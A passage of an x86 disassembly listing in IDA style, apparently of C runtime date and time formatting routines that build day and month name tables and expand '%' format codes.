mov eax, 1
jmp short loc_42DBD2
; ---------------------------------------------------------------------------
loc_42DBAC: ; CODE XREF: sub_42D6C0+491�j
; sub_42D6C0+4BF�j
mov eax, [ebp+arg_14]
add eax, 4
mov ecx, [ebp+var_4]
sub ecx, eax
add ecx, 1
mov edx, [ebp+arg_14]
mov [edx+3], cl
mov eax, [ebp+arg_14]
movsx ecx, byte ptr [eax+3]
mov edx, [ebp+arg_14]
mov byte ptr [edx+ecx+4], 0
loc_42DBCF: ; CODE XREF: sub_42D6C0:loc_42D8A1�j
mov eax, [ebp+var_58]
loc_42DBD2: ; CODE XREF: sub_42D6C0+E7�j
; sub_42D6C0+30C�j ...
mov esp, ebp
pop ebp
retn
sub_42D6C0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
mov eax, off_443FE4
mov [ebp-0Ch], eax
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-10h], 0
jmp short loc_42DC08
; ---------------------------------------------------------------------------
loc_42DBFF: ; CODE XREF: .text:0042DC3F�j
mov ecx, [ebp-10h]
add ecx, 1
mov [ebp-10h], ecx
loc_42DC08: ; CODE XREF: .text:0042DBFD�j
cmp dword ptr [ebp-10h], 7
jnb short loc_42DC41
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4]
push ecx
call sub_418E70
add esp, 4
mov esi, eax
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+1Ch]
push ecx
call sub_418E70
add esp, 4
add eax, [ebp-8]
lea edx, [eax+esi+2]
mov [ebp-8], edx
jmp short loc_42DBFF
; ---------------------------------------------------------------------------
loc_42DC41: ; CODE XREF: .text:0042DC0C�j
mov eax, [ebp-8]
add eax, 1
push eax
call sub_416A10
add esp, 4
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_42DCF9
mov ecx, [ebp-4]
mov [ebp-14h], ecx
mov dword ptr [ebp-10h], 0
jmp short loc_42DC75
; ---------------------------------------------------------------------------
loc_42DC6C: ; CODE XREF: .text:0042DCE8�j
mov edx, [ebp-10h]
add edx, 1
mov [ebp-10h], edx
loc_42DC75: ; CODE XREF: .text:0042DC6A�j
cmp dword ptr [ebp-10h], 7
jnb short loc_42DCEA
mov eax, [ebp-14h]
mov byte ptr [eax], 3Ah
mov ecx, [ebp-14h]
add ecx, 1
mov [ebp-14h], ecx
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4]
push ecx
mov edx, [ebp-14h]
push edx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp-14h]
add ecx, eax
mov [ebp-14h], ecx
mov edx, [ebp-14h]
mov byte ptr [edx], 3Ah
mov eax, [ebp-14h]
add eax, 1
mov [ebp-14h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+1Ch]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov edx, [ebp-14h]
add edx, eax
mov [ebp-14h], edx
jmp short loc_42DC6C
; ---------------------------------------------------------------------------
loc_42DCEA: ; CODE XREF: .text:0042DC79�j
mov eax, [ebp-14h]
mov byte ptr [eax], 0
mov ecx, [ebp-14h]
add ecx, 1
mov [ebp-14h], ecx
loc_42DCF9: ; CODE XREF: .text:0042DC57�j
mov eax, [ebp-4]
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
mov eax, off_443FE4
mov [ebp-0Ch], eax
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-10h], 0
jmp short loc_42DD38
; ---------------------------------------------------------------------------
loc_42DD2F: ; CODE XREF: .text:0042DD70�j
mov ecx, [ebp-10h]
add ecx, 1
mov [ebp-10h], ecx
loc_42DD38: ; CODE XREF: .text:0042DD2D�j
cmp dword ptr [ebp-10h], 0Ch
jnb short loc_42DD72
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+38h]
push ecx
call sub_418E70
add esp, 4
mov esi, eax
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+68h]
push ecx
call sub_418E70
add esp, 4
add eax, [ebp-8]
lea edx, [eax+esi+2]
mov [ebp-8], edx
jmp short loc_42DD2F
; ---------------------------------------------------------------------------
loc_42DD72: ; CODE XREF: .text:0042DD3C�j
mov eax, [ebp-8]
add eax, 1
push eax
call sub_416A10
add esp, 4
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_42DE2B
mov ecx, [ebp-4]
mov [ebp-14h], ecx
mov dword ptr [ebp-10h], 0
jmp short loc_42DDA6
; ---------------------------------------------------------------------------
loc_42DD9D: ; CODE XREF: .text:0042DE1A�j
mov edx, [ebp-10h]
add edx, 1
mov [ebp-10h], edx
loc_42DDA6: ; CODE XREF: .text:0042DD9B�j
cmp dword ptr [ebp-10h], 0Ch
jnb short loc_42DE1C
mov eax, [ebp-14h]
mov byte ptr [eax], 3Ah
mov ecx, [ebp-14h]
add ecx, 1
mov [ebp-14h], ecx
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+38h]
push ecx
mov edx, [ebp-14h]
push edx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp-14h]
add ecx, eax
mov [ebp-14h], ecx
mov edx, [ebp-14h]
mov byte ptr [edx], 3Ah
mov eax, [ebp-14h]
add eax, 1
mov [ebp-14h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+68h]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov edx, [ebp-14h]
add edx, eax
mov [ebp-14h], edx
jmp short loc_42DD9D
; ---------------------------------------------------------------------------
loc_42DE1C: ; CODE XREF: .text:0042DDAA�j
mov eax, [ebp-14h]
mov byte ptr [eax], 0
mov ecx, [ebp-14h]
add ecx, 1
mov [ebp-14h], ecx
loc_42DE2B: ; CODE XREF: .text:0042DD88�j
mov eax, [ebp-4]
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, off_443FE4
mov [ebp-0Ch], eax
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-10h], 0
jmp short loc_42DE68
; ---------------------------------------------------------------------------
loc_42DE5F: ; CODE XREF: .text:0042DE9F�j
mov ecx, [ebp-10h]
add ecx, 1
mov [ebp-10h], ecx
loc_42DE68: ; CODE XREF: .text:0042DE5D�j
cmp dword ptr [ebp-10h], 7
jnb short loc_42DEA1
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4]
push ecx
call sub_418E70
add esp, 4
mov esi, eax
mov edx, [ebp-10h]
mov eax, [ebp-0Ch]
mov ecx, [eax+edx*4+1Ch]
push ecx
call sub_418E70
add esp, 4
add eax, [ebp-8]
lea edx, [eax+esi+2]
mov [ebp-8], edx
jmp short loc_42DE5F
; ---------------------------------------------------------------------------
loc_42DEA1: ; CODE XREF: .text:0042DE6C�j
mov dword ptr [ebp-10h], 0
jmp short loc_42DEB3
; ---------------------------------------------------------------------------
loc_42DEAA: ; CODE XREF: .text:0042DEEB�j
mov eax, [ebp-10h]
add eax, 1
mov [ebp-10h], eax
loc_42DEB3: ; CODE XREF: .text:0042DEA8�j
cmp dword ptr [ebp-10h], 0Ch
jnb short loc_42DEED
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+38h]
push eax
call sub_418E70
add esp, 4
mov esi, eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+68h]
push eax
call sub_418E70
add esp, 4
add eax, [ebp-8]
lea ecx, [eax+esi+2]
mov [ebp-8], ecx
jmp short loc_42DEAA
; ---------------------------------------------------------------------------
loc_42DEED: ; CODE XREF: .text:0042DEB7�j
mov edx, [ebp-0Ch]
mov eax, [edx+98h]
push eax
call sub_418E70
add esp, 4
mov esi, eax
mov ecx, [ebp-0Ch]
mov edx, [ecx+9Ch]
push edx
call sub_418E70
add esp, 4
add eax, [ebp-8]
lea eax, [eax+esi+2]
mov [ebp-8], eax
mov ecx, [ebp-0Ch]
mov edx, [ecx+0A0h]
push edx
call sub_418E70
add esp, 4
mov ecx, [ebp-8]
lea edx, [ecx+eax+1]
mov [ebp-8], edx
mov eax, [ebp-0Ch]
mov ecx, [eax+0A4h]
push ecx
call sub_418E70
add esp, 4
mov edx, [ebp-8]
lea eax, [edx+eax+1]
mov [ebp-8], eax
mov ecx, [ebp-0Ch]
mov edx, [ecx+0A8h]
push edx
call sub_418E70
add esp, 4
mov ecx, [ebp-8]
lea edx, [ecx+eax+1]
mov [ebp-8], edx
mov eax, [ebp-8]
add eax, 0ACh
push eax
call sub_416A10
add esp, 4
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_42E1A6
mov ecx, [ebp-4]
mov [ebp-18h], ecx
mov edx, [ebp-4]
add edx, 0ACh
mov [ebp-14h], edx
push 0ACh
mov eax, off_443FE4
push eax
mov ecx, [ebp-4]
push ecx
call sub_418A00
add esp, 0Ch
mov dword ptr [ebp-10h], 0
jmp short loc_42DFCA
; ---------------------------------------------------------------------------
loc_42DFC1: ; CODE XREF: .text:0042E03C�j
mov edx, [ebp-10h]
add edx, 1
mov [ebp-10h], edx
loc_42DFCA: ; CODE XREF: .text:0042DFBF�j
cmp dword ptr [ebp-10h], 7
jnb short loc_42E03E
mov eax, [ebp-10h]
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+eax*4], edx
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov edx, [ecx+eax*4]
push edx
mov eax, [ebp-14h]
push eax
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp-14h]
lea edx, [ecx+eax+1]
mov [ebp-14h], edx
mov eax, [ebp-10h]
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+eax*4+1Ch], edx
mov eax, [ebp-10h]
mov ecx, [ebp-0Ch]
mov edx, [ecx+eax*4+1Ch]
push edx
mov eax, [ebp-14h]
push eax
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp-14h]
lea edx, [ecx+eax+1]
mov [ebp-14h], edx
jmp short loc_42DFC1
; ---------------------------------------------------------------------------
loc_42E03E: ; CODE XREF: .text:0042DFCE�j
mov dword ptr [ebp-10h], 0
jmp short loc_42E050
; ---------------------------------------------------------------------------
loc_42E047: ; CODE XREF: .text:0042E0C4�j
mov eax, [ebp-10h]
add eax, 1
mov [ebp-10h], eax
loc_42E050: ; CODE XREF: .text:0042E045�j
cmp dword ptr [ebp-10h], 0Ch
jnb short loc_42E0C6
mov ecx, [ebp-10h]
mov edx, [ebp-18h]
mov eax, [ebp-14h]
mov [edx+ecx*4+38h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+38h]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov edx, [ebp-14h]
lea eax, [edx+eax+1]
mov [ebp-14h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-18h]
mov eax, [ebp-14h]
mov [edx+ecx*4+68h], eax
mov ecx, [ebp-10h]
mov edx, [ebp-0Ch]
mov eax, [edx+ecx*4+68h]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov edx, [ebp-14h]
lea eax, [edx+eax+1]
mov [ebp-14h], eax
jmp short loc_42E047
; ---------------------------------------------------------------------------
loc_42E0C6: ; CODE XREF: .text:0042E054�j
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+98h], edx
mov eax, [ebp-0Ch]
mov ecx, [eax+98h]
push ecx
mov edx, [ebp-14h]
push edx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp-14h]
lea edx, [ecx+eax+1]
mov [ebp-14h], edx
mov eax, [ebp-18h]
mov ecx, [ebp-14h]
mov [eax+9Ch], ecx
mov edx, [ebp-0Ch]
mov eax, [edx+9Ch]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov edx, [ebp-14h]
lea eax, [edx+eax+1]
mov [ebp-14h], eax
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+0A0h], edx
mov eax, [ebp-0Ch]
mov ecx, [eax+0A0h]
push ecx
mov edx, [ebp-14h]
push edx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp-14h]
lea edx, [ecx+eax+1]
mov [ebp-14h], edx
mov eax, [ebp-18h]
mov ecx, [ebp-14h]
mov [eax+0A4h], ecx
mov edx, [ebp-0Ch]
mov eax, [edx+0A4h]
push eax
mov ecx, [ebp-14h]
push ecx
call sub_419FA0
add esp, 8
push eax
call sub_418E70
add esp, 4
mov edx, [ebp-14h]
lea eax, [edx+eax+1]
mov [ebp-14h], eax
mov ecx, [ebp-18h]
mov edx, [ebp-14h]
mov [ecx+0A8h], edx
loc_42E1A6: ; CODE XREF: .text:0042DF89�j
mov eax, [ebp-4]
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_42E1D0
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E1D0 proc near ; CODE XREF: .text:0042E1C5�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
cmp [ebp+arg_10], 0
jnz short loc_42E1E6
mov eax, off_443FE4
mov [ebp+var_10], eax
jmp short loc_42E1EC
; ---------------------------------------------------------------------------
loc_42E1E6: ; CODE XREF: sub_42E1D0+A�j
mov ecx, [ebp+arg_10]
mov [ebp+var_10], ecx
loc_42E1EC: ; CODE XREF: sub_42E1D0+14�j
mov edx, [ebp+var_10]
mov [ebp+var_4], edx
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
push offset dword_49274C
call ds:dword_494418
cmp dword_492748, 0
jz short loc_42E22A
push offset dword_49274C
call ds:dword_494414
push 13h
call sub_41BC90
add esp, 4
mov [ebp+var_8], 1
jmp short loc_42E231
; ---------------------------------------------------------------------------
loc_42E22A: ; CODE XREF: sub_42E1D0+3A�j
mov [ebp+var_8], 0
loc_42E231: ; CODE XREF: sub_42E1D0+58�j
; sub_42E1D0:loc_42E31D�j
cmp [ebp+var_C], 0
jbe loc_42E322
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [ebp+var_14], dl
cmp [ebp+var_14], 0
jz short loc_42E251
cmp [ebp+var_14], 25h
jz short loc_42E256
jmp short loc_42E2B0
; ---------------------------------------------------------------------------
loc_42E251: ; CODE XREF: sub_42E1D0+77�j
jmp loc_42E322
; ---------------------------------------------------------------------------
loc_42E256: ; CODE XREF: sub_42E1D0+7D�j
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
mov dword_492410, 0
mov ecx, [ebp+arg_8]
movsx edx, byte ptr [ecx]
cmp edx, 23h
jnz short loc_42E287
mov dword_492410, 1
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_42E287: ; CODE XREF: sub_42E1D0+A2�j
mov ecx, [ebp+var_4]
push ecx
lea edx, [ebp+var_C]
push edx
lea eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
mov al, [edx]
push eax
call sub_42E360
add esp, 14h
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
jmp short loc_42E31D
; ---------------------------------------------------------------------------
loc_42E2B0: ; CODE XREF: sub_42E1D0+7F�j
mov edx, [ebp+arg_8]
xor eax, eax
mov al, [edx]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_42E2F8
cmp [ebp+var_C], 1
jbe short loc_42E2F8
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_42E2F8: ; CODE XREF: sub_42E1D0+FB�j
; sub_42E1D0+101�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_42E31D: ; CODE XREF: sub_42E1D0+DE�j
jmp loc_42E231
; ---------------------------------------------------------------------------
loc_42E322: ; CODE XREF: sub_42E1D0+65�j
; sub_42E1D0:loc_42E251�j
cmp [ebp+var_8], 0
jz short loc_42E334
push 13h
call sub_41BD30
add esp, 4
jmp short loc_42E33F
; ---------------------------------------------------------------------------
loc_42E334: ; CODE XREF: sub_42E1D0+156�j
push offset dword_49274C
call ds:dword_494414
loc_42E33F: ; CODE XREF: sub_42E1D0+162�j
cmp [ebp+var_C], 0
jbe short loc_42E353
mov eax, [ebp+arg_0]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
sub eax, [ebp+var_C]
jmp short loc_42E355
; ---------------------------------------------------------------------------
loc_42E353: ; CODE XREF: sub_42E1D0+173�j
xor eax, eax
loc_42E355: ; CODE XREF: sub_42E1D0+181�j
mov esp, ebp
pop ebp
retn
sub_42E1D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E360 proc near ; CODE XREF: sub_42E1D0+CD�p
; sub_42EB30+3EC�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
movsx eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
sub ecx, 25h
mov [ebp+var_C], ecx
cmp [ebp+var_C], 55h
ja loc_42E8C8
mov eax, [ebp+var_C]
xor edx, edx
mov dl, ds:byte_42E929[eax]
jmp ds:off_42E8CD[edx*4]
loc_42E393: ; DATA XREF: .text:0042E8FD�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4]
push eax
call sub_42E980
add esp, 0Ch
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E3B5: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8D1�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+1Ch]
push eax
call sub_42E980
add esp, 0Ch
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E3D8: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E901�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+38h]
push eax
call sub_42E980
add esp, 0Ch
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E3FB: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8D5�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+68h]
push eax
call sub_42E980
add esp, 0Ch
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E41E: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E905�o
cmp dword_492410, 0
jz short loc_42E4A6
mov dword_492410, 0
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+0A4h]
push eax
call sub_42EB30
add esp, 14h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_42E460
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E460: ; CODE XREF: sub_42E360+F9�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 20h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+0A8h]
push eax
call sub_42EB30
add esp, 14h
jmp short loc_42E519
; ---------------------------------------------------------------------------
loc_42E4A6: ; CODE XREF: sub_42E360+C5�j
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+0A0h]
push eax
call sub_42EB30
add esp, 14h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_42E4D5
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E4D5: ; CODE XREF: sub_42E360+16E�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 20h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+0A8h]
push eax
call sub_42EB30
add esp, 14h
loc_42E519: ; CODE XREF: sub_42E360+144�j
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E51E: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E909�o
mov ecx, dword_492410
mov dword_492414, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+arg_4]
mov edx, [ecx+0Ch]
push edx
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E548: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8D9�o
mov eax, dword_492410
mov dword_492414, eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 2
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
push ecx
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E570: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8DD�o
mov edx, dword_492410
mov dword_492414, edx
mov eax, [ebp+arg_4]
mov eax, [eax+8]
cdq
mov ecx, 0Ch
idiv ecx
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
jnz short loc_42E59A
mov [ebp+var_4], 0Ch
loc_42E59A: ; CODE XREF: sub_42E360+231�j
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+var_4]
push ecx
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E5B5: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E90D�o
mov edx, dword_492410
mov dword_492414, edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 3
mov edx, [ebp+arg_4]
mov eax, [edx+1Ch]
add eax, 1
push eax
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E5E2: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E911�o
mov ecx, dword_492410
mov dword_492414, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+arg_4]
mov edx, [ecx+10h]
add edx, 1
push edx
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E60F: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8E1�o
mov eax, dword_492410
mov dword_492414, eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 2
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
push ecx
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E637: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E915�o
mov edx, [ebp+arg_4]
cmp dword ptr [edx+8], 0Bh
jg short loc_42E65C
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_10]
mov eax, [edx+98h]
push eax
call sub_42E980
add esp, 0Ch
jmp short loc_42E676
; ---------------------------------------------------------------------------
loc_42E65C: ; CODE XREF: sub_42E360+2DE�j
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_10]
mov ecx, [eax+9Ch]
push ecx
call sub_42E980
add esp, 0Ch
loc_42E676: ; CODE XREF: sub_42E360+2FA�j
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E67B: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8E5�o
mov edx, dword_492410
mov dword_492414, edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 2
mov edx, [ebp+arg_4]
mov eax, [edx]
push eax
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E6A4: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8E9�o
mov ecx, dword_492410
mov dword_492414, ecx
mov edx, [ebp+arg_4]
mov eax, [edx+18h]
mov [ebp+var_8], eax
jmp short loc_42E70D
; ---------------------------------------------------------------------------
loc_42E6BB: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E919�o
mov ecx, dword_492410
mov dword_492414, ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 1
mov ecx, [ebp+arg_4]
mov edx, [ecx+18h]
push edx
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E6E5: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8ED�o
mov eax, dword_492410
mov dword_492414, eax
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx+18h], 0
jnz short loc_42E701
mov [ebp+var_8], 6
jmp short loc_42E70D
; ---------------------------------------------------------------------------
loc_42E701: ; CODE XREF: sub_42E360+396�j
mov edx, [ebp+arg_4]
mov eax, [edx+18h]
sub eax, 1
mov [ebp+var_8], eax
loc_42E70D: ; CODE XREF: sub_42E360+359�j
; sub_42E360+39F�j
mov ecx, [ebp+arg_4]
mov edx, [ecx+1Ch]
cmp edx, [ebp+var_8]
jge short loc_42E721
mov [ebp+var_4], 0
jmp short loc_42E74E
; ---------------------------------------------------------------------------
loc_42E721: ; CODE XREF: sub_42E360+3B6�j
mov eax, [ebp+arg_4]
mov eax, [eax+1Ch]
cdq
mov ecx, 7
idiv ecx
mov [ebp+var_4], eax
mov edx, [ebp+arg_4]
mov eax, [edx+1Ch]
cdq
mov ecx, 7
idiv ecx
cmp edx, [ebp+var_8]
jl short loc_42E74E
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_42E74E: ; CODE XREF: sub_42E360+3BF�j
; sub_42E360+3E3�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 2
mov edx, [ebp+var_4]
push edx
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E769: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E91D�o
cmp dword_492410, 0
jz short loc_42E7A0
mov dword_492410, 0
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A4h]
push edx
call sub_42EB30
add esp, 14h
